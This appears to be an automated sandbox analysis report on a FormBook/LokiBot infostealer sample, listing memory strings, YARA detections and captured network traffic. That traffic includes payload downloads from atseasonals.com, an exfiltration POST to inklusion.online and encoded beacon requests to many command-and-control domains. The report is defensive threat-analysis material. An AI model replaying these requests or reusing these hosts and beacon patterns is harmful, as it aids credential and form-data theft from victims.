Source: explorer.exe, 0000000E.00000000.47774864959.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47820777870.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057235938.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47872878262.000000000CD5E000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.comR
Source: explorer.exe, 0000000E.00000000.47764488527.0000000005202000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044007267.0000000005202000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860582752.0000000005202000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47808989078.0000000005202000.00000004.00000001.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBm8qVB.img
Source: explorer.exe, 0000000E.00000000.47883732426.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068764789.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47784748807.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47784599668.000000000EF08000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883880392.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068924445.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831331678.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831166569.000000000EF08000.00000004.00000001.sdmp String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: DB1.23.dr String found in binary or memory: https://login.live.com/
Source: rundll32.exe, 0000000F.00000002.51919311329.00000000005CB000.00000004.00000020.sdmp, cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.dr String found in binary or memory: https://login.live.com//
Source: cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.dr String found in binary or memory: https://login.live.com/https://login.live.com/
Source: rundll32.exe, 0000000F.00000002.51919311329.00000000005CB000.00000004.00000020.sdmp, cmd.exe, 00000017.00000003.50652681832.0000000002C85000.00000004.00000001.sdmp, cmd.exe, 00000017.00000002.50655035814.0000000002C10000.00000004.00000001.sdmp, DB1.23.dr String found in binary or memory: https://login.live.com/v104
Source: explorer.exe, 0000000E.00000000.47821015918.000000000CD93000.00000004.00000001.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47774864959.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47820777870.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057235938.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47872878262.000000000CD5E000.00000004.00000001.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmp String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmp String found in binary or memory: https://word.office.comERM
Source: explorer.exe, 0000000E.00000000.47823088938.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47777354065.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47877256176.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779217096.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47804704949.000000000315A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48062074884.000000000D231000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47875315528.000000000CF7A000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825427484.000000000D231000.00000004.00000001.sdmp, rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehpf
Source: explorer.exe, 0000000E.00000000.47784748807.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883880392.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068924445.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831331678.000000000EF25000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50661739455.0000000040212000.00000004.00020000.sdmp String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.unitedmetal-saudi.com
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50661739455.0000000040212000.00000004.00020000.sdmp String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
Source: unknown HTTP traffic detected: POST /n8ds/ HTTP/1.1Host: www.inklusion.onlineConnection: closeContent-Length: 131142Cache-Control: no-cacheOrigin: http://www.inklusion.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.inklusion.online/n8ds/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 64 44 3d 33 56 45 69 59 58 53 66 54 54 54 35 52 6b 67 39 58 4c 78 76 35 4a 39 46 77 44 34 32 41 57 44 75 43 38 4d 7a 52 61 6e 69 76 71 45 6e 38 4b 6f 79 66 6b 55 4f 47 44 69 6d 58 77 77 58 48 37 58 6b 4e 59 34 6f 4e 63 6b 78 69 7a 31 68 67 70 79 4d 6d 67 6e 61 6c 30 67 69 47 4f 76 30 77 55 51 58 6c 52 4d 62 6f 79 6f 55 35 73 62 34 78 37 6a 33 75 7a 7e 75 28 53 35 6d 28 6c 69 5a 4e 39 6e 30 7a 35 32 6a 65 76 30 69 35 46 36 30 73 52 64 71 63 34 76 4a 28 77 4b 46 67 42 50 36 39 75 46 56 6a 71 39 6f 56 38 6f 50 50 5a 38 4d 58 30 72 63 4f 4e 76 31 7a 79 37 4e 38 44 34 52 6d 33 4d 4a 31 53 58 36 6e 42 39 42 36 4a 71 45 45 55 49 62 5a 72 58 6f 33 65 55 77 47 79 62 5f 69 59 31 47 6e 74 71 64 75 4b 64 31 78 75 34 57 50 57 6c 4a 6c 54 4b 4f 39 4b 73 66 6c 4e 47 54 33 67 53 64 53 44 6d 30 69 5f 4d 54 64 45 6d 68 4d 69 6f 54 31 35 79 37 45 4f 7e 66 6a 70 4e 2d 59 45 67 47 28 56 50 70 49 59 78 4e 6e 41 41 44 44 46 56 49 33 6e 61 56 37 79 70 39 58 35 46 46 35 56 66 50 76 55 39 43 4f 30 68 61 55 61 45 4c 66 33 72 5f 6c 76 45 34 61 73 48 36 78 4a 6d 70 46 6b 65 2d 4c 42 62 71 39 46 78 34 76 4c 51 34 63 42 62 64 4a 65 71 65 70 4c 52 6e 49 4b 6e 67 42 70 66 44 50 6c 73 5a 77 73 62 43 4d 31 45 31 66 63 72 5f 65 35 42 52 6a 56 41 49 7e 36 35 62 34 46 66 33 42 4c 51 7a 6b 75 4c 62 51 68 45 5f 67 50 59 65 70 73 54 47 69 76 68 32 6e 6f 57 74 32 36 53 45 6b 5a 63 49 48 4f 74 6b 63 4f 41 4b 68 62 6c 51 6e 34 64 7a 30 4a 54 51 28 38 4f 67 30 33 49 6d 66 43 4f 67 4a 73 4c 63 6e 77 4f 72 44 56 45 66 62 51 4c 72 6d 65 52 79 74 37 62 63 43 46 58 72 75 55 44 65 61 6d 59 47 66 46 64 55 32 54 6e 77 66 5a 51 64 38 32 6c 2d 36 75 47 4c 66 64 75 41 68 4c 33 65 64 71 5a 37 6c 4a 6a 47 72 6b 79 38 70 44 76 4b 50 72 49 53 70 4b 44 76 59 6c 39 6e 66 41 64 75 32 51 44 55 62 31 39 31 31 6a 65 78 73 66 7e 46 61 54 64 79 74 41 6f 30 6f 70 28 54 55 53 36 56 53 56 50 44 70 75 28 4b 6e 36 52 57 42 63 46 30 35 36 62 61 49 4f 6a 6d 6b 43 30 75 33 54 5a 33 59 41 61 35 49 45 51 7a 75 64 69 64 31 37 62 37 44 50 7e 45 31 46 4c 30 43 37 4e 6a 65 42 4d 66 55 39 4f 4d 55 36 58 58 79 49 33 33 58 34 4c 4d 72 53 70 6b 78 53 34 2d 67 32 37 49 4b 71 65 79 6b 5a 6f 56 4c 56 66 67 4a 79 6e 77 30 56 71 44 32 4f 67 75 7e 41 59 6c 57 7a 39 42 47 53 53 71 61 2d 70 53 6c 44 34 71 43 6e 52 6b 62 77 31 63 57 6b 54 41 30 6f 4a 43 57 6f 63 31 49 73 31 50 4e 4b 4c 4f 46 4e 47 30 43 6b 4a 6d 37 52 79 66 71 62 6f 52 7a 6d 62 72 46 36 4a 75 65 68 32 58 74 65 48 38 70 6f 73 35 36 37 55 37 54 71 57 64 71 66 62 46 78 4a 62 56 4a 51 38 32 51 72 52 6b 4f 43 70 49 5a 45 57 6a 4b 58 43 32 5a 73 4d 53 35 77 34 56 57
Source: unknown DNS traffic detected: queries for: atseasonals.com
Source: global traffic HTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: atseasonals.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: atseasonals.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1 Host: www.topwowshopping.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1 Host: www.growebox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1 Host: www.ayudavida.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1 Host: www.stylesbykee.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 Host: www.mackthetruck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1 Host: www.helpcloud.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1 Host: www.ozattaos.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1 Host: www.unitedmetal-saudi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 Host: www.mackthetruck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1 Host: www.divorcefearfreedom.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1 Host: www.jamiecongedo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1 Host: www.lopsrental.lease Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 Host: www.mackthetruck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49841 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Uses 32bit PE files
Source: Zr26f1rL6r.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
